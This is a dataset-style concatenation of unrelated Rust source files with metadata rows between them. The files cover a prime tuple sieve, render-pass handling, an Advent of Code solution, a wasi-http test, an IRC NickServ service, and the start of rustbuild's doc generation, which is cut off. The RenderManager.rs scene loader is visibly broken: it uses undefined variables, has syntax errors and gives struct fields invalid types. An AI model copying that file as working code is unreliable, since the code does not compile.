    0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 20, 24, 32, 36, 0x40, 0x80, 0x100,
    0x200, 0x400, 0x800, 0x1000, 0x2000, 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000,
    0x100_000
);
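// A small usage sketch (not part of the original file). `backing_capacity` is an illustrative
// helper showing how generic code can query a backing array's fixed capacity through the trait
// without constructing a value of that array type.
#[cfg(test)]
mod array_trait_sketch {
    use super::Array;

    fn backing_capacity<A: Array>() -> usize {
        A::size()
    }

    #[test]
    fn fixed_size_arrays_report_their_capacity() {
        // 4 and 32 are among the sizes covered by the impl_array! invocation above.
        assert_eq!(backing_capacity::<[u8; 4]>(), 4);
        assert_eq!(backing_capacity::<[u64; 32]>(), 32);
    }
}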
true
e5ecfd859d12c8347de7fea22806d2b7e7425b88
Rust
MichaelBell/tuplesieve
/src/main.rs
UTF-8
4,109
3
3
[]
no_license
use std::io::{self, Write}; const TUPLE_LEN: usize = 10; const MAX_PRIME: usize = 1400; const MAX_PRIME_OVER_2: usize = MAX_PRIME / 2; const MIN_PRIME: usize = 3; const SIEVE_SIZE: usize = 1000000; const MAX_GAP: usize = 120000000; // 3, 5 at 4 // 7 at 10 // 11 at 14, 16 // So mod 2310 we have (1271, 1691) //const OFFSETS: [u32; TUPLE_LEN] = [0, 2, 6, 8, 12, 18, 20, 26, 30, 32]; // // 3 at 4 // 5 at 8 // 7 at 8 // 11 at 16, 18 // So mod 2310 we have (587, 1007) const OFFSETS: [u32; TUPLE_LEN] = [0, 2, 6, 12, 14, 20, 24, 26, 30, 32]; const BASE: u32 = 587; struct PrimeAndOffset { prime: u32, offset: [usize; TUPLE_LEN], } fn get_primes() -> [u8; MAX_PRIME_OVER_2] { let mut sieve: [u8; MAX_PRIME_OVER_2] = [0; MAX_PRIME_OVER_2]; for p in (MIN_PRIME..MAX_PRIME).step_by(2) { if sieve[p >> 1] == 0 { for q in ((p + (p >> 1))..MAX_PRIME_OVER_2).step_by(p) { sieve[q] = 1; } } } sieve } fn mod_inverse(n: u32, p: u32) -> u32 { // Stupid version is fine for i in 1..p-1 { if (i * n) % p == 1 { return i } } panic!("Failed modular inverse for {} % {}", n, p); } // Tuple is of form 2310f + o // Offsets solve // f_i = o.2310^-1 % p fn make_offsets(prime_sieve: [u8; MAX_PRIME_OVER_2]) -> Vec<PrimeAndOffset> { let mut poff: Vec<PrimeAndOffset> = Vec::new(); for i in 6..MAX_PRIME_OVER_2 { if prime_sieve[i] == 0 { let p = (i*2 + 1) as u32; let prim_mod_p = 2310 % p; let prim_inv = mod_inverse(prim_mod_p, p); let mut offset: [usize; TUPLE_LEN] = [0; TUPLE_LEN]; for i in 0..TUPLE_LEN { offset[i] = (((OFFSETS[i] + BASE) * prim_inv) % p) as usize; if offset[i] != 0 { offset[i] = p as usize - offset[i]; } assert!(((offset[i] * 2310) as u32 + OFFSETS[i] + BASE) % p == 0); } poff.push(PrimeAndOffset { prime: p, offset: offset, }); } } poff } fn run_sieve(poff_arr: &mut Vec<PrimeAndOffset>) -> Vec<usize> { let mut sieve: [u8; SIEVE_SIZE] = [0; SIEVE_SIZE]; for poff in poff_arr.iter_mut() { let p = poff.prime as usize; for i in 0..TUPLE_LEN { for j in (poff.offset[i]..SIEVE_SIZE).step_by(p) { sieve[j] = 1; } let sieve_adjust = SIEVE_SIZE % p; if poff.offset[i] < sieve_adjust { poff.offset[i] += p - sieve_adjust; } else { poff.offset[i] -= sieve_adjust; } } } let mut results : Vec<usize> = Vec::new(); for i in 0..SIEVE_SIZE { if sieve[i] == 0 { results.push(i); } } results } fn tuple_from_offset(offset: usize) -> usize { offset * 2310 + BASE as usize } fn main() { use std::mem; assert!(mem::size_of::<usize>() >= 8); let prime_sieve = get_primes(); let mut poff_arr = make_offsets(prime_sieve); let mut tuples: Vec<usize> = Vec::new(); for batch in 0..700000 { let results = run_sieve(&mut poff_arr); for i in results { tuples.push(i + batch * SIEVE_SIZE); } print!("{}\r", batch); io::stdout().flush().unwrap(); } println!("Done sieving"); use multimap::MultiMap; let mut gaps = MultiMap::new(); for i in 0..tuples.len() { for j in i+1..tuples.len() { let gap = tuples[j] - tuples[i]; if gap > MAX_GAP { break; } if tuples[i] > gap { if let Some(first_tuple_vec) = gaps.get_vec(&gap) { if first_tuple_vec.contains(&(tuples[i] - gap)) { if tuples.contains(&(tuples[j] + gap)) { //println!("Gap: {} Tuples: {} {} {}", gap, tuple_from_offset(tuples[i] - gap), tuple_from_offset(tuples[i]), tuple_from_offset(tuples[j])); // println!("*** Set of 4! 
{}", tuple_from_offset(tuples[j] + gap)); println!("{}, {}, {}, {}, ", tuple_from_offset(tuples[i] - gap), tuple_from_offset(tuples[i]), tuple_from_offset(tuples[j]), tuple_from_offset(tuples[j] + gap)); } } } } gaps.insert(gap, tuples[i]); } if (i & 0x7fff) == 0 && tuples[i] > MAX_GAP { let limit = tuples[i] - MAX_GAP; gaps.retain(|_, &ft| { ft > limit }); print!("{}/{}\r", i, tuples.len()); io::stdout().flush().unwrap(); } } }
true
94dd9152d339f35f9c431441d871c79a2e637bdc
Rust
teohhanhui/makepad
/render/src/pass.rs
UTF-8
7,690
2.609375
3
[ "MIT" ]
permissive
use crate::cx::*; #[derive(Default, Clone)] pub struct Pass { pub pass_id: Option<usize> } impl Pass { pub fn begin_pass(&mut self, cx: &mut Cx) { if self.pass_id.is_none() { // we need to allocate a CxPass self.pass_id = Some(if cx.passes_free.len() != 0 { cx.passes_free.pop().unwrap() } else { cx.passes.push(CxPass::default()); cx.passes.len() - 1 }); } let pass_id = self.pass_id.unwrap(); if let Some(window_id) = cx.window_stack.last() { if cx.windows[*window_id].main_pass_id.is_none() { // we are the main pass of a window let cxpass = &mut cx.passes[pass_id]; cx.windows[*window_id].main_pass_id = Some(pass_id); cxpass.dep_of = CxPassDepOf::Window(*window_id); cxpass.pass_size = cx.windows[*window_id].get_inner_size(); cx.current_dpi_factor = cx.get_delegated_dpi_factor(pass_id); } else if let Some(dep_of_pass_id) = cx.pass_stack.last() { let dep_of_pass_id = *dep_of_pass_id; cx.passes[pass_id].dep_of = CxPassDepOf::Pass(dep_of_pass_id); cx.passes[pass_id].pass_size = cx.passes[dep_of_pass_id].pass_size; cx.current_dpi_factor = cx.get_delegated_dpi_factor(dep_of_pass_id); } else { cx.passes[pass_id].dep_of = CxPassDepOf::None; cx.passes[pass_id].override_dpi_factor = Some(1.0); cx.current_dpi_factor = 1.0; } } else { cx.passes[pass_id].dep_of = CxPassDepOf::None; cx.passes[pass_id].override_dpi_factor = Some(1.0); cx.current_dpi_factor = 1.0; } let cxpass = &mut cx.passes[pass_id]; cxpass.main_view_id = None; cxpass.color_textures.truncate(0); cx.pass_stack.push(pass_id); //let pass_size = cxpass.pass_size; //self.set_ortho_matrix(cx, Vec2::zero(), pass_size); } pub fn override_dpi_factor(&mut self, cx: &mut Cx, dpi_factor:f32){ if let Some(pass_id) = self.pass_id { cx.passes[pass_id].override_dpi_factor = Some(dpi_factor); cx.current_dpi_factor = dpi_factor; } } pub fn make_dep_of_pass(&mut self, cx: &mut Cx, pass: &Pass) { let cxpass = &mut cx.passes[self.pass_id.unwrap()]; if let Some(pass_id) = pass.pass_id { cxpass.dep_of = CxPassDepOf::Pass(pass_id) } else { cxpass.dep_of = CxPassDepOf::None } } pub fn set_size(&mut self, cx: &mut Cx, pass_size: Vec2) { let cxpass = &mut cx.passes[self.pass_id.unwrap()]; cxpass.pass_size = pass_size; } pub fn add_color_texture(&mut self, cx: &mut Cx, texture: &mut Texture, clear_color: ClearColor) { texture.set_desc(cx, None); let pass_id = self.pass_id.expect("Please call add_color_texture after begin_pass"); let cxpass = &mut cx.passes[pass_id]; cxpass.color_textures.push(CxPassColorTexture { texture_id: texture.texture_id.unwrap(), clear_color: clear_color }) } pub fn set_depth_texture(&mut self, cx: &mut Cx, texture: &mut Texture, clear_depth: ClearDepth) { texture.set_desc(cx, None); let pass_id = self.pass_id.expect("Please call set_depth_texture after begin_pass"); let cxpass = &mut cx.passes[pass_id]; cxpass.depth_texture = texture.texture_id; cxpass.clear_depth = clear_depth; } pub fn end_pass(&mut self, cx: &mut Cx) { cx.pass_stack.pop(); if cx.pass_stack.len()>0{ cx.current_dpi_factor = cx.get_delegated_dpi_factor(*cx.pass_stack.last().unwrap()); } } pub fn redraw_pass_area(&mut self, cx: &mut Cx) { if let Some(pass_id) = self.pass_id { cx.redraw_pass_and_sub_passes(pass_id); } } } #[derive(Clone)] pub enum ClearColor { InitWith(Color), ClearWith(Color) } impl Default for ClearColor { fn default() -> Self { ClearColor::ClearWith(Color::default()) } } #[derive(Clone)] pub enum ClearDepth { InitWith(f64), ClearWith(f64) } #[derive(Default, Clone)] pub struct CxPassColorTexture { pub clear_color: ClearColor, pub texture_id: usize } 
#[derive(Default, Clone)] #[repr(C)] pub struct PassUniforms{ camera_projection:[f32;16], camera_view:[f32;16], dpi_factor:f32, dpi_dilate:f32, pad1:f32, pad2:f32 } impl PassUniforms{ pub fn as_slice(&self)->&[f32;std::mem::size_of::<PassUniforms>()]{ unsafe{std::mem::transmute(self)} } } #[derive(Clone)] pub struct CxPass { pub color_textures: Vec<CxPassColorTexture>, pub depth_texture: Option<usize>, pub clear_depth: ClearDepth, pub depth_init: f64, pub override_dpi_factor: Option<f32>, pub main_view_id: Option<usize>, pub dep_of: CxPassDepOf, pub paint_dirty: bool, pub pass_size: Vec2, pub pass_uniforms: PassUniforms, pub zbias_step: f32, pub platform: CxPlatformPass, } impl Default for CxPass { fn default() -> Self { CxPass { zbias_step: 0.001, pass_uniforms: PassUniforms::default(), color_textures: Vec::new(), depth_texture: None, override_dpi_factor: None, clear_depth: ClearDepth::ClearWith(1.0), depth_init: 1.0, main_view_id: None, dep_of: CxPassDepOf::None, paint_dirty: false, pass_size: Vec2::default(), platform: CxPlatformPass::default() } } } #[derive(Clone, Debug)] pub enum CxPassDepOf { Window(usize), Pass(usize), None } impl CxPass { pub fn def_uniforms(sg: ShaderGen) -> ShaderGen { sg.compose(shader_ast!({ let camera_projection: mat4<PassUniform>; let camera_view: mat4<PassUniform>; let dpi_factor: float<PassUniform>; let dpi_dilate: float<PassUniform>; })) } pub fn uniform_camera_projection(&mut self, v: &Mat4) { //dump in uniforms for i in 0..16 { self.pass_uniforms.camera_projection[i] = v.v[i]; } } pub fn uniform_camera_view(&mut self, v: &Mat4) { //dump in uniforms for i in 0..16 { self.pass_uniforms.camera_view[i] = v.v[i]; } } pub fn set_dpi_factor(&mut self, dpi_factor: f32) { let dpi_dilate = (2. - dpi_factor).max(0.).min(1.); self.pass_uniforms.dpi_factor = dpi_factor; self.pass_uniforms.dpi_dilate = dpi_dilate; } pub fn set_ortho_matrix(&mut self, offset: Vec2, size: Vec2) { let ortho_matrix = Mat4::ortho( offset.x, offset.x + size.x, offset.y, offset.y + size.y, 100., -100., 1.0, 1.0 ); //println!("{} {}", ortho_matrix.v[10], ortho_matrix.v[14]); //println!("CHECK {} {} {:?}", size.x, size.y,ortho_matrix.transform_vec4(Vec4{x:200.,y:300.,z:100.,w:1.0})); self.uniform_camera_projection(&ortho_matrix); //self.set_matrix(cx, &ortho_matrix); } //pub fn set_matrix(&mut self, cx: &mut Cx, matrix: &Mat4) { //let pass_id = self.pass_id.expect("Please call set_ortho_matrix after begin_pass"); //let cxpass = &mut cx.passes[pass_id]; // } }
true
d9c45a9c28969970d6038d7b11c434a466c4d12e
Rust
csirkeee/advent2020
/day9a/src/main.rs
UTF-8
831
3.03125
3
[]
no_license
use std::error::Error;
use std::io;
use std::io::BufRead;

fn main() -> Result<(), Box<dyn Error>> {
    let stdin = io::stdin();

    let mut v: Vec<i64> = Vec::new();

    for line in stdin.lock().lines() {
        if let Ok(n) = line?.parse() {
            let len = v.len();
            if len >= 25 {
                let mut good = false;
                'outer: for i in len - 25..len - 1 {
                    for j in i..len {
                        if v[i] != v[j] && v[i] + v[j] == n {
                            good = true;
                            break 'outer;
                        }
                    }
                }
                if !good {
                    println!("{}", n);
                    break;
                }
            }
            v.push(n);
        }
    }

    return Ok(());
}
true
6361b62d1f73ddfd9c7e98944c1bc93ef5e0527d
Rust
simonchatts/fsevent-rust
/examples/fsevent-demo.rs
UTF-8
435
2.515625
3
[ "MIT" ]
permissive
extern crate fsevent;
use std::sync::mpsc::channel;
use std::thread;

#[cfg(not(target_os="macos"))]
fn main() {}

#[cfg(target_os="macos")]
fn main() {
    let (sender, receiver) = channel();

    let _t = thread::spawn(move || {
        let fsevent = fsevent::FsEvent::new(vec![".".to_string()]);
        fsevent.observe(sender);
    });

    loop {
        let val = receiver.recv();
        println!("{:?}", val.unwrap());
    }
}
true
b3bf2a73ec747a462420b6d458c1473861fe4814
Rust
ziliang8658/CalaRender
/src/RenderManager.rs
UTF-8
6,291
3.046875
3
[]
no_license
use std::fs::File; use std::io::{self, BufReader, BufRead}; use std::path::Path; mod Geometry; use Geometry::Vec3f; pub struct SceneManager { pub models: Vec<Model>, pub lights: Vec<Light>, } pub struct Model { meshId: i32, materidId: i32, position: Vec3f, rotation: Vec3f, scaling: Vec3f, meshResPath: str, matResPath: str, albedo_map: str, normal_map: str, ambient_ligth: str, roughness_map: str, } pub struct Light { lightType: str, radius: f32, period: u32, position: Vec3f, Color: Vec3f, } impl SceneManager { pub fn loadScene(&self, sceneFile: &str) -> bool { let file = File::open(filename).unwrap(); let reader = BufReader::new(file); for (index, line) in reader.lines().enumerate() { let line = line.unwrap(); // Ignore errors. // Show the line and its number. println!("{}. {}", index + 1, line); } return true; } } fn parseFromFile(file: &File) { let mut reader = BufReader::new(file); let mut buf = String::from(""); let line_index = 0; let mut models: Vec<Model> = Vec::new(); let mut lights: Vec<Model> = Vec::new(); while (reader.read_line(&mut buf) != 0) { if lien_index == 0 { if line == 'm' { //now we read the model data reader.read_line(&mut buf); let model_count = buf.trim().parse().expect("it's not a number"); let mut model_index = 0; while model_index < model_count { parseModelInfo(&mut reader, &mut buf, &mut models) model_index += 1; } } if line == 'l' { reader.read_line(&mut buf); let light_count = buf.trim().parse().expect("it's not a number"); let mut light_index = 0; while light_index < light_count { parseModelInfo(&mut reader, &mut buf, &mut models) model_index += 1; } } } } } fn parseModelInfo(reader: &mut BufReader<&File>, buf: &mut String, models: &mut Vec<Model>, basePath: &str) -> Model { //Firstly, read the meshId and materialId; reader.read_line(buf); let mut split_info = buf.split(" "); if len(split_info) != 2 {} let meshId: i32 = split_info.next().unwrap().parse().unwrap(); let materidId = split_info.next().unwrap().parse().unwrap(); let meshFilePath = basePath + "/meshes/" + meshId + "_mesh.obj"; let materialPath = basePath + "/materials/" + materidId + "/" + materidId; //Then, read the position info; split_info = buf.split(" "); let mut modelInfo: Vec<Vec3f> = Vec::new(); let mut infoIndex = 0; while infoIndex < 3 { reader.read_line(buf); let mut split_info = buf.split(" "); modelInfo.push(Vec3f { x: split_info.next().unwrap().parse().unwrap(), y: split_info.next().unwrap().parse().unwrap(), z: split_info.next().unwrap().parse().unwrap(), }); infoIndex += 1; } loadImageFromMaterial(model, materidId); models.push(Model { meshId, materidId: 0, position: Vec3f { x: modelInfo.get(0).unwrap().x, y: modelInfo.get(0).unwrap().y, z: modelInfo.get(0).unwrap().z, }, rotation: Vec3f { x: modelInfo.get(1).unwrap().x, y: modelInfo.get(1).unwrap().y, z: modelInfo.get(1).unwrap().z, }, scaling: Vec3f { x: modelInfo.get(2).unwrap().x, y: modelInfo.get(2).unwrap().y, z: modelInfo.get(2).unwrap().z, }, } ); //Finally, we only need to read an empty line to finish the model parsing process reader.read_line(buf); } fn parseLightInfo(reader: &mut BufReader<&File>, buf: &mut String, lights: &mut Vec<Light>) -> Model { let mut light = Light { lightType: "" as str, radius: 0.0, period: 0, position: Vec3f::new(0.0, 0.0, 0.0), Color: Vec3f::new(0.0, 0.0, 0.0), }; //Firstly, read the LigthType reader.read_line(buf); let lightType: &str = buf.trim().clone(); let mut key = ""; let mut radius = ""; let mut period = 0; if lightType == "o" || lightType == "l" { let mut infoIndex = 0; 
reader.read_line(buf); let mut split_info = buf.split(" "); key = split_info.next().unwrap().parse().unwrap(); radius = split_info.next().unwrap().parse().unwrap(); period = split_info.next().unwrap().parse().unwrap(); } let mut infoIndex = 0; while infoIndex < 2 { //Then, read the position and Color Info split_info = buf.split(" "); let mut fieldInfo = 0; reader.read_line(buf); let mut split_info = buf.split(" "); key = split_info.next().unwrap().parse().unwrap(); if infoIndex == 1 { light.position = Vec3f::new( x: split_info.next().unwrap().parse().unwrap(), y: split_info.next().unwrap().parse().unwrap(), z: split_info.next().unwrap().parse().unwrap(), ) } else { light.Color = Vec3f::new( x: split_info.next().unwrap().parse().unwrap(), y: split_info.next().unwrap().parse().unwrap(), z: split_info.next().unwrap().parse().unwrap(), ) } infoIndex += 1 } //Finally, we only need to read an empty line to finish the model parsing process reader.read_line(buf); lights.push(light); } fn loadImageFromMaterial(model: &mut Model, materialPath: &str) { model.albedo_map = materialPath + "_albedo.png"; model.normal_map = materialPath + "_normal.png"; model.ambient_ligth = materialPath + "_ao.png"; model.roughness_map = materialPath + "_rough.png" } fn loadResFromMesh(model: &mut Model, meshFilePath: &str) {}
true
1d8115d738ad11d28d0e2d57233b32e40e032377
Rust
sdleffler/type-level-logic-rs
/src/strong/mod.rs
UTF-8
313
2.65625
3
[ "MIT", "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
//! "Strongly" enforced (non-SFINAE-style) type operators. Here, "strong" means that if you use
//! a type operator from this module, Rust will complain if it can't guarantee an `impl` for it
//! and you haven't listed it as a trait bound in a `where` clause.

pub mod boolean;
pub mod ternary;
pub mod balanced;
true
c37bea4f9610cb231978f27b712ebc8ce0ece744
Rust
NightRoadIx/IntraLenguaje
/parimpar.rs
UTF-8
589
3.796875
4
[]
no_license
use std::io;

fn input(user_message: &str) -> io::Result<String> {
    use std::io::Write;

    print!("{}", user_message);
    io::stdout().flush()?;

    let mut buffer: String = String::new();
    io::stdin().read_line(&mut buffer)?;

    Ok(buffer.trim_right().to_owned())
}

fn main() {
    let num = input("Ingrese un número: ")
        .unwrap()
        .parse::<i32>()
        .expect("Expected a number");

    if num % 2 == 0 {
        println!("`{}` es un número par.", num);
    } else {
        println!("`{}` es un número impar", num);
    }
}
true
328480ca73d1bb310fe92cdd841dea478975cf74
Rust
skrapi/ClojureRS
/src/namespace.rs
UTF-8
911
2.90625
3
[]
no_license
use crate::rust_core::{AddFn, StrFn};
use crate::value::ToValue;
use crate::value::Value;
use crate::Symbol;
use std::cell::RefCell;
use std::collections::HashMap;
use std::rc::Rc;

#[derive(Debug, Clone)]
pub struct Namespace {
    pub name: Symbol,
    mappings: RefCell<HashMap<Symbol, Rc<Value>>>,
}

impl Namespace {
    pub fn new(name: Symbol, mappings: RefCell<HashMap<Symbol, Rc<Value>>>) -> Namespace {
        Namespace { name, mappings }
    }

    pub fn insert(&self, sym: Symbol, val: Rc<Value>) {
        self.mappings.borrow_mut().insert(sym, val);
    }

    pub fn get(&self, sym: &Symbol) -> Rc<Value> {
        match self.mappings.borrow_mut().get(sym) {
            Some(val) => Rc::clone(val),
            None => Rc::new(Value::Condition(format!("Undefined symbol {}", sym.name))),
        }
    }
}

#[derive(Debug, Clone)]
pub struct Namespaces(pub RefCell<HashMap<Symbol, Namespace>>);
true
a634884cbfa961aaf57619eea61816debc6b7c7d
Rust
bytecodealliance/wasmtime
/crates/test-programs/wasi-http-tests/src/bin/outbound_request_get.rs
UTF-8
1,068
2.53125
3
[ "LLVM-exception", "Apache-2.0" ]
permissive
use anyhow::{Context, Result};
use wasi_http_tests::bindings::wasi::http::types::{Method, Scheme};

struct Component;

fn main() {}

async fn run() -> Result<(), ()> {
    let res = wasi_http_tests::request(
        Method::Get,
        Scheme::Http,
        "localhost:3000",
        "/get?some=arg&goes=here",
        None,
        None,
    )
    .await
    .context("localhost:3000 /get")
    .unwrap();

    println!("localhost:3000 /get: {res:?}");

    assert_eq!(res.status, 200);
    let method = res.header("x-wasmtime-test-method").unwrap();
    assert_eq!(std::str::from_utf8(method).unwrap(), "GET");
    let uri = res.header("x-wasmtime-test-uri").unwrap();
    assert_eq!(
        std::str::from_utf8(uri).unwrap(),
        "http://localhost:3000/get?some=arg&goes=here"
    );
    assert_eq!(res.body, b"");

    Ok(())
}

impl wasi_http_tests::bindings::exports::wasi::cli::run::Run for Component {
    fn run() -> Result<(), ()> {
        wasi_http_tests::in_tokio(async { run().await })
    }
}

wasi_http_tests::export_command_extended!(Component);
true
a0264408127c08a67439167c69f6c30a4051614a
Rust
EngineersBox/NES-Emulator
/src/cpu/utils.rs
UTF-8
185
2.6875
3
[]
no_license
// Verifies that a hex address is in the legal range.
// Note: `addr` is a `u16`, and 0x0000..=0xFFFF already covers every possible
// `u16` value, so as written this check can never fail and always returns true.
pub fn check_hex_range(addr: u16) -> bool {
    !(addr < 0x0000 || addr > 0xFFFF)
}
true
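The guard above only becomes meaningful if the incoming address arrives in a type wider than the 16-bit bus. A minimal sketch of that variant, assuming a hypothetical u32 input (not part of the original crate):

// Hypothetical variant: only useful when the address can exceed the 16-bit range.
fn check_hex_range_u32(addr: u32) -> bool {
    addr <= 0xFFFF
}

fn main() {
    assert!(check_hex_range_u32(0x0000));
    assert!(check_hex_range_u32(0xFFFF));
    assert!(!check_hex_range_u32(0x1_0000));
}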
148673a1d4f93b40d8d6ddd769ac210e8bee6093
Rust
gnoliyil/fuchsia
/src/devices/bin/driver_tools/src/subcommands/i2c/subcommands/transact/args.rs
UTF-8
846
2.5625
3
[ "BSD-2-Clause" ]
permissive
// Copyright 2022 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

use {argh::FromArgs, std::path::PathBuf};

#[derive(FromArgs, Debug, PartialEq)]
#[argh(
    subcommand,
    name = "transact",
    description = "Sends a sequence of I2C transactions to an I2C device in the order they are written",
    example = "Send transactions to read 100 bytes, then write the bytes 0xab, 0x02, and 0xff; and then read 4 bytes to I2C device 004: $ driver i2cutil transact r 100 w 171 2 255 r 4"
)]
pub struct TransactCommand {
    #[argh(positional, description = "path of the I2C device relative to devfs")]
    pub device_path: PathBuf,

    #[argh(positional, description = "transactions to send to I2C device")]
    pub transactions: Vec<String>,
}
true
15688589aa3c4acc4477eeb27642d73c399f5af7
Rust
diath/ayame
/src/services/nickserv.rs
UTF-8
4,690
2.90625
3
[]
no_license
use std::collections::HashMap; use async_trait::async_trait; use tokio::sync::Mutex; use crate::client::Client; use crate::service::Service; pub struct NickServ { pub nicks: Mutex<HashMap<String, String>>, } impl NickServ { pub fn new() -> NickServ { NickServ { nicks: Mutex::new(HashMap::new()), } } async fn reply(&self, client: &Client, message: &str) { let nick = client.nick.lock().await; client .send_raw(format!(":NickServ@services NOTICE {} :{}", nick, message)) .await; } } #[async_trait] impl Service for NickServ { async fn on_message(&self, client: &Client, params: Vec<&str>) { if params.len() < 1 { return; } match params[0].to_ascii_lowercase().as_str() { "register" => { if params.len() < 3 { self.reply(client, "Not enough params").await; } else { if self.nicks.lock().await.contains_key(params[1]) { self.reply(client, "Nick already taken").await; } else { let nick = client.nick.lock().await.to_string(); if nick == params[1] { self.nicks .lock() .await .insert(params[1].to_string(), params[2].to_string()); self.reply(client, "Nick successfully registered").await; } else { self.reply(client, "You can only register your current nick") .await; } } } } "identify" => { if params.len() < 3 { self.reply(client, "Not enough params").await; } else if *client.identified.lock().await { self.reply(client, "You are already identified").await; } else if let Some(password) = self.nicks.lock().await.get(params[1]) { if password == params[2] { (*client.identified.lock().await) = true; self.reply(client, "You are now identified for this nick") .await; } else { self.reply(client, "Wrong password").await; } } else { self.reply(client, "Nick not registered").await; } } "logout" => { let identified = *client.identified.lock().await; if identified { (*client.identified.lock().await) = false; self.reply(client, "You are no longer identified").await; } else { self.reply(client, "You are not identified").await; } } "drop" => { if params.len() < 3 { self.reply(client, "Not enough params").await; } else if *client.identified.lock().await { self.reply(client, "You must logout before dropping a nick") .await; } else { let mut password = None; if let Some(_password) = self.nicks.lock().await.get(params[1]) { password = Some(_password.clone()); } if let Some(password) = password { if password == params[2] { self.nicks.lock().await.remove(params[1]); self.reply(client, "The nick registration has been released") .await; } else { self.reply(client, "Wrong password").await; } } else { self.reply(client, "Nick not registered").await; } } } "help" => { self.reply(client, "NickServ commands:").await; self.reply(client, "REGISTER <nick> <password>").await; self.reply(client, "IDENTIFY <nick> <password>").await; self.reply(client, "LOGOUT").await; self.reply(client, "DROP <nick> <password>").await; self.reply(client, "HELP").await; } _ => { self.reply(client, "Unknown command, try HELP").await; } } } }
true
4b940ec0c20860f03678722ddec6eb4cf695f97e
Rust
kotnik/rustful
/examples/handler_storage.rs
UTF-8
2,400
3.34375
3
[ "MIT" ]
permissive
#[macro_use] extern crate rustful; use std::io::{self, Read}; use std::fs::File; use std::path::Path; use std::sync::{Arc, RwLock}; use std::error::Error; use rustful::{Server, Context, Response, Handler, TreeRouter}; use rustful::Method::Get; fn main() { println!("Visit http://localhost:8080 to try this example."); //Read the page before we start let page = Arc::new(read_string("examples/handler_storage/page.html").unwrap()); //The shared counter state let value = Arc::new(RwLock::new(0)); let router = insert_routes!{ TreeRouter::new() => { "/" => Get: Counter{ page: page.clone(), value: value.clone(), operation: None }, "/add" => Get: Counter{ page: page.clone(), value: value.clone(), operation: Some(add) }, "/sub" => Get: Counter{ page: page.clone(), value: value.clone(), operation: Some(sub) } } }; let server_result = Server { host: 8080.into(), handlers: router, content_type: content_type!(Text / Html; Charset = Utf8), ..Server::default() }.run(); match server_result { Ok(_server) => {}, Err(e) => println!("could not start server: {}", e.description()) } } fn add(value: i32) -> i32 { value + 1 } fn sub(value: i32) -> i32 { value - 1 } fn read_string<P: AsRef<Path>>(path: P) -> io::Result<String> { //Read file into a string let mut string = String::new(); File::open(path).and_then(|mut f| f.read_to_string(&mut string)).map(|_| string) } struct Counter { //We are using the handler to preload the page in this exmaple page: Arc<String>, value: Arc<RwLock<i32>>, operation: Option<fn(i32) -> i32> } impl Handler for Counter { fn handle_request(&self, _context: Context, response: Response) { self.operation.map(|op| { //Lock the value for writing and update it let mut value = self.value.write().unwrap(); *value = op(*value); }); //Insert the value into the page and write it to the response let count = self.value.read().unwrap().to_string(); response.into_writer().send(self.page.replace("{}", &count[..])); } }
true
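The shared-counter pattern in the example above, stripped of the web framework: the same Arc<RwLock<i32>> updated from several threads using only the standard library:

use std::sync::{Arc, RwLock};
use std::thread;

fn main() {
    let value = Arc::new(RwLock::new(0i32));

    let handles: Vec<_> = (0..4).map(|_| {
        let value = Arc::clone(&value);
        thread::spawn(move || {
            // Each "request" takes the write lock, bumps the counter, releases it.
            let mut v = value.write().unwrap();
            *v += 1;
        })
    }).collect();

    for h in handles {
        h.join().unwrap();
    }

    assert_eq!(*value.read().unwrap(), 4);
}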
67966d047395ad3d734a7cd4ad144fd28b9a8269
Rust
IThawk/rust-project
/rust-master/src/bootstrap/doc.rs
UTF-8
25,194
2.640625
3
[ "MIT", "LicenseRef-scancode-other-permissive", "Apache-2.0", "BSD-3-Clause", "BSD-2-Clause", "NCSA" ]
permissive
//! Documentation generation for rustbuilder. //! //! This module implements generation for all bits and pieces of documentation //! for the Rust project. This notably includes suites like the rust book, the //! nomicon, rust by example, standalone documentation, etc. //! //! Everything here is basically just a shim around calling either `rustbook` or //! `rustdoc`. use std::collections::HashSet; use std::fs; use std::io; use std::path::{PathBuf, Path}; use crate::Mode; use build_helper::{t, up_to_date}; use crate::util::symlink_dir; use crate::builder::{Builder, Compiler, RunConfig, ShouldRun, Step}; use crate::tool::{self, prepare_tool_cargo, Tool, SourceType}; use crate::compile; use crate::cache::{INTERNER, Interned}; use crate::config::Config; macro_rules! book { ($($name:ident, $path:expr, $book_name:expr;)+) => { $( #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct $name { target: Interned<String>, } impl Step for $name { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path($path).default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure($name { target: run.target, }); } fn run(self, builder: &Builder<'_>) { builder.ensure(RustbookSrc { target: self.target, name: INTERNER.intern_str($book_name), src: doc_src(builder), }) } } )+ } } // NOTE: When adding a book here, make sure to ALSO build the book by // adding a build step in `src/bootstrap/builder.rs`! book!( EditionGuide, "src/doc/edition-guide", "edition-guide"; EmbeddedBook, "src/doc/embedded-book", "embedded-book"; Nomicon, "src/doc/nomicon", "nomicon"; Reference, "src/doc/reference", "reference"; RustByExample, "src/doc/rust-by-example", "rust-by-example"; RustcBook, "src/doc/rustc", "rustc"; RustdocBook, "src/doc/rustdoc", "rustdoc"; ); fn doc_src(builder: &Builder<'_>) -> Interned<PathBuf> { INTERNER.intern_path(builder.src.join("src/doc")) } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct UnstableBook { target: Interned<String>, } impl Step for UnstableBook { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = run.builder; run.path("src/doc/unstable-book").default_condition(builder.config.docs) } fn make_run(run: RunConfig<'_>) { run.builder.ensure(UnstableBook { target: run.target, }); } fn run(self, builder: &Builder<'_>) { builder.ensure(UnstableBookGen { target: self.target, }); builder.ensure(RustbookSrc { target: self.target, name: INTERNER.intern_str("unstable-book"), src: builder.md_doc_out(self.target), }) } } #[derive(Debug, Copy, Clone, Hash, PartialEq, Eq)] pub struct CargoBook { target: Interned<String>, name: Interned<String>, } impl Step for CargoBook { type Output = (); const DEFAULT: bool = true; fn should_run(run: ShouldRun<'_>) -> ShouldRun<'_> { let builder = 